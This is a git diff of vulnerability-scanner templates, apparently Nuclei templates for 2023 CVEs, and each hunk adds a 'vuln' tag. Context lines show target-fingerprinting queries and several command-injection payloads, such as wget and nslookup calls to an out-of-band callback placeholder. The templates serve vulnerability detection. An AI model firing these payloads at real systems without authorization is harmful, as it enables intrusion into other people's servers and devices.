title="geoserver" - app="geoserver" google-query: intitle:"geoserver" - tags: cve2023,cve,geoserver,ogc,sqli,intrusive,osgeo,vkev + tags: cve2023,cve,geoserver,ogc,sqli,intrusive,osgeo,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2518.yaml b/http/cves/2023/CVE-2023-2518.yaml index c09a3fb1555..1a2d1fa7ae8 100644 --- a/http/cves/2023/CVE-2023-2518.yaml +++ b/http/cves/2023/CVE-2023-2518.yaml @@ -22,7 +22,7 @@ info: vendor: yikesinc product: easy_forms_for_mailchimp fofa-query: body="wp-content/plugins/yikes-inc-easy-mailchimp-extender/" - tags: cve,cve2023,wp,wordpress,wp-plugin,xss,yikes-inc-easy-mailchimp-extender,authenticated + tags: cve,cve2023,wp,wordpress,wp-plugin,xss,yikes-inc-easy-mailchimp-extender,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-25194.yaml b/http/cves/2023/CVE-2023-25194.yaml index 738213a8a2c..6cc62348cf3 100644 --- a/http/cves/2023/CVE-2023-25194.yaml +++ b/http/cves/2023/CVE-2023-25194.yaml @@ -29,7 +29,7 @@ info: - html:"Apache Druid" - http.html:"apache druid" fofa-query: body="apache druid" - tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast,vkev + tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-25280.yaml b/http/cves/2023/CVE-2023-25280.yaml index c28d0b3e72d..34be118264e 100644 --- a/http/cves/2023/CVE-2023-25280.yaml +++ b/http/cves/2023/CVE-2023-25280.yaml @@ -20,7 +20,7 @@ info: metadata: vendor: dlink product: dir820la1_firmware - tags: cve,cve2023,rce,unauth,kev,dlink,vkev + tags: cve,cve2023,rce,unauth,kev,dlink,vkev,vuln variables: payload: "wget http://{{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index 5e6a985c5c7..30a903aaaf4 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: churchcrm product: churchcrm - tags: cve2023,cve,churchcrm,xss,authenticated + tags: cve2023,cve,churchcrm,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 158c9f1f006..2b819dcf852 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -33,7 +33,7 @@ info: - body="Metersphere" - body="metersphere" - title="metersphere" - tags: cve,cve2023,metersphere,lfi,vkev + tags: cve,cve2023,metersphere,lfi,vkev,vuln variables: str: "{{rand_base(4)}}" rand: "{{rand_base(3)}}" diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index 8787a24fd42..bac41a55bd2 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -32,7 +32,7 @@ info: - http.title:"ruckus wireless" fofa-query: title="ruckus wireless" google-query: intitle:"ruckus wireless" - tags: cve2023,cve,ruckus,rce,kev,ruckuswireless,vkev + tags: cve2023,cve,ruckus,rce,kev,ruckuswireless,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-26035.yaml b/http/cves/2023/CVE-2023-26035.yaml index 38c7b934ff9..119fd870641 100644 --- a/http/cves/2023/CVE-2023-26035.yaml +++ b/http/cves/2023/CVE-2023-26035.yaml @@ -30,7 +30,7 @@ info: - html:"ZM - Login" - http.html:"zm - login" fofa-query: body="zm - login" - tags: cve,cve2023,rce,zoneminder,unauth,packetstorm + tags: cve,cve2023,rce,zoneminder,unauth,packetstorm,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index 4273ac434ef..c491aa9c42d 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -32,7 +32,7 @@ info: shodan-query: - "Server: Lexmark_Web_Server" - "server: lexmark_web_server" - tags: cve2023,cve,printer,iot,lexmark,vkev + tags: cve2023,cve,printer,iot,lexmark,vkev,vuln variables: cmd: 'nslookup {{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-2624.yaml b/http/cves/2023/CVE-2023-2624.yaml index 98797eea84c..8e820e8d74b 100644 --- a/http/cves/2023/CVE-2023-2624.yaml +++ b/http/cves/2023/CVE-2023-2624.yaml @@ -27,7 +27,7 @@ info: vendor: iqonic product: kivicare framework: wordpress - tags: cve,cve2023,kivicare,wp,wp-plugin,wordpress,wpscan,authenticated + tags: cve,cve2023,kivicare,wp,wp-plugin,wordpress,wpscan,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index 6f22907bcba..1e2f27643d1 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -34,7 +34,7 @@ info: - http.title:jira fofa-query: title=jira google-query: intitle:jira - tags: cve2023,cve,lfi,jira,cms,atlassian,stagil,vkev + tags: cve2023,cve,lfi,jira,cms,atlassian,stagil,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 8d67df5d8d0..2b0b439af20 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -34,7 +34,7 @@ info: - http.title:jira fofa-query: title=jira google-query: intitle:jira - tags: cve,cve2023,lfi,jira,cms,atlassian,stagil,vkev + tags: cve,cve2023,lfi,jira,cms,atlassian,stagil,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-26258.yaml b/http/cves/2023/CVE-2023-26258.yaml index 0fa8f7834c4..b61a740a742 100644 --- a/http/cves/2023/CVE-2023-26258.yaml +++ b/http/cves/2023/CVE-2023-26258.yaml @@ -23,7 +23,7 @@ info: vendor: arcserve product: udp shodan-query: http.favicon.hash:-1889244460 - tags: cve,cve2023,arcserve,auth-bypass,vkev + tags: cve,cve2023,arcserve,auth-bypass,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index 1fcd11542c6..f35721c4596 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -34,7 +34,7 @@ info: - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" - tags: cve2023,cve,adobe,coldfusion,auth-bypass,vkev + tags: cve2023,cve,adobe,coldfusion,auth-bypass,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index 6b35041259f..97d29c07311 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -38,7 +38,7 @@ info: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" - tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev,vkev + tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index 758d05237b0..156dfb6e0ab 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -31,7 +31,7 @@ info: product: jorani shodan-query: http.favicon.hash:-2032163853 fofa-query: icon_hash=-2032163853 - tags: cve2023,cve,jorani,rce,packetstorm,vkev + tags: cve2023,cve,jorani,rce,packetstorm,vkev,vuln variables: payload: "" header: "{{to_upper(rand_base(12))}}" diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index e87ec68e244..c278824f664 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -32,7 +32,7 @@ info: fofa-query: - app="泛微-EOffice" - app="泛微-eoffice" - tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive,vkev + tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive,vkev,vuln variables: file: '{{rand_base(5, "abc")}}' string: "CVE-2023-2648" diff --git a/http/cves/2023/CVE-2023-26802.yaml b/http/cves/2023/CVE-2023-26802.yaml index 098f3f95e1f..a6e491301ca 100644 --- a/http/cves/2023/CVE-2023-26802.yaml +++ b/http/cves/2023/CVE-2023-26802.yaml @@ -19,7 +19,7 @@ info: metadata: vendor: dcnglobal product: dcbi-netlog-lab_firmware - tags: cve,cve2023,rce,unauth,netlog,vkev + tags: cve,cve2023,rce,unauth,netlog,vkev,vuln variables: file_name: "{{rand_text_alpha(4)}}.html" diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index c96e7814318..5624a818d1b 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: churchcrm product: churchcrm - tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated + tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 4878d94d17d..4439b579a4c 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: churchcrm product: churchcrm - tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated + tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 9e6a8b69eac..6f9f90a7b93 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -31,7 +31,7 @@ info: - http.html:"Atutor" - http.html:"atutor" fofa-query: body="atutor" - tags: cve,cve2023,xss,atutor,vkev + tags: cve,cve2023,xss,atutor,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index acd1d46b7c7..9e85b3c1424 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -24,7 +24,7 @@ info: product: "popup_module_\\(on_entering\\,_exit_popup\\,_add_product\\)_and_newsletter" framework: prestashop shodan-query: "http.component:\"prestashop\"" - tags: time-based-sqli,cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate + tags: time-based-sqli,cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index e5ecc12dc4d..0f3d20e3de2 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -29,7 +29,7 @@ info: vendor: joommasters product: jms_blog framework: prestashop - tags: time-based-sqli,cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters,vkev + tags: time-based-sqli,cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index 38873762716..2a822e52d36 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -37,7 +37,7 @@ info: - icon_hash=-633108100 - title="sign in - appwrite" google-query: intitle:"sign in - appwrite" - tags: cve2023,cve,appwrite,ssrf,oast,vkev + tags: cve2023,cve,appwrite,ssrf,oast,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-27163.yaml b/http/cves/2023/CVE-2023-27163.yaml index ce0acb350df..331faba4d6e 100644 --- a/http/cves/2023/CVE-2023-27163.yaml +++ b/http/cves/2023/CVE-2023-27163.yaml @@ -26,7 +26,7 @@ info: product: request-baskets shodan-query: http.html:"Request-Baskets" fofa-query: body="Request-Baskets" - tags: cve,cve2023,ssrf,request-baskets,oast,proxy,vkev + tags: cve,cve2023,ssrf,request-baskets,oast,proxy,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index bf1df51c98c..965f0837950 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: gdidees product: gdidees_cms - tags: cve2023,cve,packetstorm,file-download,gdidees,lfr + tags: cve2023,cve,packetstorm,file-download,gdidees,lfr,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 5ed33d673b6..3f8ceb7de0f 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -32,7 +32,7 @@ info: - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" - tags: cve2023,cve,authenticated,tenable,opencats,redirect + tags: cve2023,cve,authenticated,tenable,opencats,redirect,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index e063d5d488a..d7222b8a218 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -33,7 +33,7 @@ info: publicwww-query: /wp-content/plugins/mstore-api/ shodan-query: http.html:/wp-content/plugins/mstore-api/ fofa-query: body=/wp-content/plugins/mstore-api/ - tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,mstore-api,inspireui,vkev + tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,mstore-api,inspireui,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index 0438d979f65..5b4189cf1c9 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -37,7 +37,7 @@ info: fofa-query: - body="papercut" - body="content=\"papercut\"" - tags: cve2023,cve,packetstorm,papercut,rce,oast,unauth,kev,vkev + tags: cve2023,cve,packetstorm,papercut,rce,oast,unauth,kev,vkev,vuln variables: cmd: "nslookup {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 031dbd8a439..3b0bbd3ffa8 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -33,7 +33,7 @@ info: - http.html:"spip.php?page=backend" - cpe:"cpe:2.3:a:spip:spip" fofa-query: body="spip.php?page=backend" - tags: cve,cve2023,packetstorm,spip,rce,vkev + tags: cve,cve2023,packetstorm,spip,rce,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2745.yaml b/http/cves/2023/CVE-2023-2745.yaml index ada412644b0..4870fd5b4a6 100644 --- a/http/cves/2023/CVE-2023-2745.yaml +++ b/http/cves/2023/CVE-2023-2745.yaml @@ -20,7 +20,7 @@ info: metadata: max-request: 3 framework: wordpress - tags: cve,cve2023,wpscan,disclosure,wp,wordpress,lfi + tags: cve,cve2023,wpscan,disclosure,wp,wordpress,lfi,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index bca52e6b0ff..0c1e711eca0 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -36,7 +36,7 @@ info: - cpe:"cpe:2.3:a:home-assistant:home-assistant" fofa-query: title="home assistant" google-query: intitle:"home assistant" - tags: cve2023,cve,homeassistant,auth-bypass,rce,home-assistant,vkev + tags: cve2023,cve,homeassistant,auth-bypass,rce,home-assistant,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index b4f63bc7448..c7e83bdaa39 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="apache superset" - icon_hash=1582430156 - tags: packetstorm,cve,cve2023,apache,superset,auth-bypass,kev,vkev + tags: packetstorm,cve,cve2023,apache,superset,auth-bypass,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-27584.yaml b/http/cves/2023/CVE-2023-27584.yaml index f6e6a773c0d..c773ec540a1 100644 --- a/http/cves/2023/CVE-2023-27584.yaml +++ b/http/cves/2023/CVE-2023-27584.yaml @@ -21,7 +21,7 @@ info: metadata: max-request: 1 verified: true - tags: cve,cve2023,dragonfly,exposure,jwt,secret + tags: cve,cve2023,dragonfly,exposure,jwt,secret,vuln variables: orig_iat: '{{to_unix_time(unixtime())}}' diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 79e57e33ed7..472933c0460 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: readtomyshoe_project product: readtomyshoe - tags: cve2023,cve,debug,readtomyshoe,disclosure,readtomyshoe_project,vkev + tags: cve2023,cve,debug,readtomyshoe,disclosure,readtomyshoe_project,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-27637.yaml b/http/cves/2023/CVE-2023-27637.yaml index 63c5101b6be..aab80986cb4 100644 --- a/http/cves/2023/CVE-2023-27637.yaml +++ b/http/cves/2023/CVE-2023-27637.yaml @@ -27,7 +27,7 @@ info: product: custom_product_designer framework: prestashop fofa-query: body="Prestashop" && body="tshirtecommerce" - tags: cve,cve2023,prestashop,tshirtecommerce,sqli,time-based-sqli,vkev + tags: cve,cve2023,prestashop,tshirtecommerce,sqli,time-based-sqli,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-27638.yaml b/http/cves/2023/CVE-2023-27638.yaml index 6f35683c59f..43fe57e6f4d 100644 --- a/http/cves/2023/CVE-2023-27638.yaml +++ b/http/cves/2023/CVE-2023-27638.yaml @@ -23,7 +23,7 @@ info: vendor: tshirtecommerce product: prestashop fofa-query: body="Prestashop" && body="tshirtecommerce" - tags: cve,cve2023,prestashop,tshirtecommerce,sqli,vkev + tags: cve,cve2023,prestashop,tshirtecommerce,sqli,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-27639.yaml b/http/cves/2023/CVE-2023-27639.yaml index 069cc1d6821..8a98b972634 100644 --- a/http/cves/2023/CVE-2023-27639.yaml +++ b/http/cves/2023/CVE-2023-27639.yaml @@ -25,7 +25,7 @@ info: product: custom_product_designer framework: prestashop google-query: inurl:"/tshirtecommerce/" - tags: cve,cve2023,prestashop,tshirtecommerce,lfi,vkev + tags: cve,cve2023,prestashop,tshirtecommerce,lfi,vkev,vuln http: - method: POST diff --git a/http/cves/2023/CVE-2023-27640.yaml b/http/cves/2023/CVE-2023-27640.yaml index ad0eaadbba2..86f29a5c58a 100644 --- a/http/cves/2023/CVE-2023-27640.yaml +++ b/http/cves/2023/CVE-2023-27640.yaml @@ -24,7 +24,7 @@ info: product: custom_product_designer framework: prestashop google-query: inurl:"/tshirtecommerce/" - tags: cve,cve2023,prestashop,tshirtecommerce,lfi,vkev + tags: cve,cve2023,prestashop,tshirtecommerce,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-27641.yaml b/http/cves/2023/CVE-2023-27641.yaml index 9b56729b81c..22ad67ac4b1 100644 --- a/http/cves/2023/CVE-2023-27641.yaml +++ b/http/cves/2023/CVE-2023-27641.yaml @@ -26,7 +26,7 @@ info: product: listserv shodan-query: http.html:"LISTSERV" fofa-query: body="listserv" - tags: cve2023,cve,xss,listserv,edb,lsoft + tags: cve2023,cve,xss,listserv,edb,lsoft,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml index b78fd0c6c6f..b6132722b6a 100644 --- a/http/cves/2023/CVE-2023-2766.yaml +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -30,7 +30,7 @@ info: fofa-query: - app="泛微-EOffice" - app="泛微-eoffice" - tags: cve,cve2023,weaver,eoffice,exposure + tags: cve,cve2023,weaver,eoffice,exposure,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-2779.yaml b/http/cves/2023/CVE-2023-2779.yaml index beff6c98c1d..c2740cd56b7 100644 --- a/http/cves/2023/CVE-2023-2779.yaml +++ b/http/cves/2023/CVE-2023-2779.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/super-socializer/ fofa-query: body=/wp-content/plugins/super-socializer/ publicwww-query: "/wp-content/plugins/super-socializer/" - tags: cve,cve2023,wpscan,xss,wp,wp-plugin,wordpress,authenticated,super-socializer,heator + tags: cve,cve2023,wpscan,xss,wp,wp-plugin,wordpress,authenticated,super-socializer,heator,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index b7349e56b85..76f920841e3 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -34,7 +34,7 @@ info: - title="mlflow" - app="mlflow" google-query: intitle:"mlflow" - tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects + tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index 2b6dbe7b3ce..20544f24af5 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -24,7 +24,7 @@ info: framework: prestashop shodan-query: html:"/xipblog" fofa-query: app="Prestashop" - tags: time-based-sqli,cve,cve2023,prestashop,sqli,xipblog + tags: time-based-sqli,cve,cve2023,prestashop,sqli,xipblog,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml index 19f4f208a83..8f3637c2433 100644 --- a/http/cves/2023/CVE-2023-27922.yaml +++ b/http/cves/2023/CVE-2023-27922.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/newsletter/ fofa-query: body=/wp-content/plugins/newsletter/ publicwww-query: /wp-content/plugins/newsletter/ - tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,newsletter,authenticated,thenewsletterplugin + tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,newsletter,authenticated,thenewsletterplugin,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 09cc5ce246f..d95e14ec294 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -41,7 +41,7 @@ info: - /wp-content/plugins/eventon/ - /wp-content/plugins/eventon-lite/ google-query: inurl:"/wp-content/plugins/eventon/" - tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon,vkev + tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 1345bf0c33a..b5484075ecf 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -34,7 +34,7 @@ info: fofa-query: body=/wp-content/plugins/woocommerce-payments publicwww-query: /wp-content/plugins/woocommerce-payments google-query: inurl:/wp-content/plugins/woocommerce-payments - tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,automattic,vkev + tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,automattic,vkev,vuln variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index cb0c218aa7a..106997d3585 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -26,7 +26,7 @@ info: vendor: ajaydsouza product: connections_reloaded framework: wordpress - tags: wpscan,cve,cve2023,wordpress,wp-theme,xss,ajaydsouza + tags: wpscan,cve,cve2023,wordpress,wp-theme,xss,ajaydsouza,vuln variables: str: "{{rand_base(6)}}" random: "{{rand_base(3)}}" diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 2b924a4e0ac..022b1236221 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -32,7 +32,7 @@ info: - http.html:"ellucian company" fofa-query: body="ellucian company" google-query: "login with ellucian ethos identity" - tags: cve2023,cve,cas,xss,ellucian + tags: cve2023,cve,cas,xss,ellucian,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 5f6f3d4d624..346e36bf79d 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -33,7 +33,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve2023,cve,gitlab,lfi,authenticated,intrusive + tags: cve2023,cve,gitlab,lfi,authenticated,intrusive,vuln variables: data: "{{rand_base(5)}}" diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index 7ec7eaceb45..0e1acaf7dca 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -35,7 +35,7 @@ info: google-query: - intitle:"Altenergy Power Control Software" - intitle:"altenergy power control software" - tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems,vkev + tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 2e34ae10785..f86082d9861 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -41,7 +41,7 @@ info: google-query: - intitle:"minio browser" - intitle:"minio console" - tags: cve,cve2023,minio,console,exposure,kev,vkev + tags: cve,cve2023,minio,console,exposure,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index b2f0236e158..4b2f8bcc18a 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -30,7 +30,7 @@ info: framework: wordpress shodan-query: http.html:"/wp-content/plugins/gift-voucher/" fofa-query: "body=\"/wp-content/plugins/gift-voucher/\"" - tags: time-based-sqli,cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen + tags: time-based-sqli,cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 79a5470c706..79f40b72176 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -28,7 +28,7 @@ info: vendor: technocrackers product: bulk_price_update_for_woocommerce framework: wordpress - tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update,technocrackers + tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update,technocrackers,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index d5eaed9476e..3fd5b69f741 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: zohocorp product: manageengine_admanager_plus - tags: cve,cve2023,packetstorm,manageengine,admanager,rce,oast,authenticated,zohocorp + tags: cve,cve2023,packetstorm,manageengine,admanager,rce,oast,authenticated,zohocorp,vuln variables: cmd: "nslookup.exe {{interactsh-url}} 1.1.1.1" diff --git a/http/cves/2023/CVE-2023-29204.yaml b/http/cves/2023/CVE-2023-29204.yaml index fba02210bb8..3366cd7aec7 100644 --- a/http/cves/2023/CVE-2023-29204.yaml +++ b/http/cves/2023/CVE-2023-29204.yaml @@ -29,7 +29,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2023,xwiki,redirect + tags: cve,cve2023,xwiki,redirect,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 2ec620ab315..9785a2b7497 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -38,7 +38,7 @@ info: - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" - tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev,vkev + tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev,vkev,vuln http: - method: GET 